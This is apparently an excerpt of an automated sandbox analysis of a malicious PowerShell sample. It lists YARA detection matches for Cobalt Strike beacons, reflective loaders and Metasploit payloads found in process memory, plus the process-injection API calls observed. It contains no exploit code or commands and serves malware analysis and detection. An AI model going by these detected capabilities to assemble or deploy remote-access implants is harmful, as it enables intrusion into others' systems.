                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
                    Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
                    Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
                    Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTRMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34CA74 NtDuplicateObject,NtDuplicateObject,DuplicateHandle,0_2_000001A6ED34CA74
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34C8F4 NtCreateThreadEx,GetCurrentProcess,NtCreateThreadEx,NtCreateThreadEx,CreateThread,CreateRemoteThread,0_2_000001A6ED34C8F4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34D134 NtUnmapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,GetCurrentProcess,UnmapViewOfFile,0_2_000001A6ED34D134
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34D1C8 NtAllocateVirtualMemory,GetCurrentProcess,NtAllocateVirtualMemory,NtAllocateVirtualMemory,VirtualAlloc,VirtualAllocEx,0_2_000001A6ED34D1C8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34CC00 NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,GetCurrentProcess,MapViewOfFile,0_2_000001A6ED34CC00
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34D4D8 NtQueryVirtualMemory,GetCurrentProcess,NtQueryVirtualMemory,GetCurrentProcess,VirtualQuery,0_2_000001A6ED34D4D8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34D2EC GetCurrentProcess,NtFreeVirtualMemory,VirtualFree,0_2_000001A6ED34D2EC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34CB7C NtGetContextThread,NtGetContextThread,GetThreadContext,0_2_000001A6ED34CB7C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34D3B8 NtProtectVirtualMemory,GetCurrentProcess,NtProtectVirtualMemory,NtProtectVirtualMemory,VirtualProtect,VirtualProtectEx,0_2_000001A6ED34D3B8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34CE74 NtOpenThread,NtOpenThread,OpenThread,0_2_000001A6ED34CE74
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34CD6C NtOpenProcess,NtOpenProcess,SetLastError,OpenProcess,0_2_000001A6ED34CD6C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34D5C4 NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,0_2_000001A6ED34D5C4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34D030 NtResumeThread,NtResumeThread,ResumeThread,ResumeThread,0_2_000001A6ED34D030
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34D0B0 NtSetContextThread,NtSetContextThread,SetThreadContext,0_2_000001A6ED34D0B0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34CF60 NtReadVirtualMemory,NtReadVirtualMemory,ReadProcessMemory,0_2_000001A6ED34CF60
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34C754 NtClose,NtClose,CloseHandle,SetLastError,0_2_000001A6ED34C754
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34C7E4 NtCreateSection,NtCreateSection,CreateFileMappingA,0_2_000001A6ED34C7E4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED341268 CreateProcessWithLogonW,GetLastError,0_2_000001A6ED341268
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3012640_2_000001A6ED301264
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED30AAB00_2_000001A6ED30AAB0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3059140_2_000001A6ED305914
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3019280_2_000001A6ED301928
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED2E916C0_2_000001A6ED2E916C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3329800_2_000001A6ED332980
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED2F03340_2_000001A6ED2F0334
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED30C3970_2_000001A6ED30C397
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED30239C0_2_000001A6ED30239C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3003740_2_000001A6ED300374
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED30E6000_2_000001A6ED30E600
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED2ECE3C0_2_000001A6ED2ECE3C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED30C6800_2_000001A6ED30C680
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED2E96800_2_000001A6ED2E9680
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED2FF5A80_2_000001A6ED2FF5A8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED30CFF00_2_000001A6ED30CFF0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED2F6F380_2_000001A6ED2F6F38
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED30B7B00_2_000001A6ED30B7B0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED35F2000_2_000001A6ED35F200
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED33DA3C0_2_000001A6ED33DA3C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED33A2800_2_000001A6ED33A280
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED35D2800_2_000001A6ED35D280
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3501A80_2_000001A6ED3501A8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED35DBF00_2_000001A6ED35DBF0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED347B380_2_000001A6ED347B38
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED35C3B00_2_000001A6ED35C3B0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED351E640_2_000001A6ED351E64
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED34867C0_2_000001A6ED34867C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED35B6B00_2_000001A6ED35B6B0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3565140_2_000001A6ED356514
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED3525280_2_000001A6ED352528
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED339D6C0_2_000001A6ED339D6C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED340F340_2_000001A6ED340F34
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED352F9C0_2_000001A6ED352F9C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED35CF970_2_000001A6ED35CF97
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001A6ED350F740_2_000001A6ED350F74
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD347983D50_2_00007FFD347983D5
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD347944FB0_2_00007FFD347944FB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3479A4750_2_00007FFD3479A475
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34796CCD0_2_00007FFD34796CCD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD347926F50_2_00007FFD347926F5
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3479AEFA0_2_00007FFD3479AEFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34792EFA0_2_00007FFD34792EFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34795EFA0_2_00007FFD34795EFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34797FF20_2_00007FFD34797FF2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD347943220_2_00007FFD34794322
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34866B920_2_00007FFD34866B92
                    Source: oEFrY6Xcyl.ps1, type: SAMPLEMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: amsi64_2820.amsi.csv, type: OTHERMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
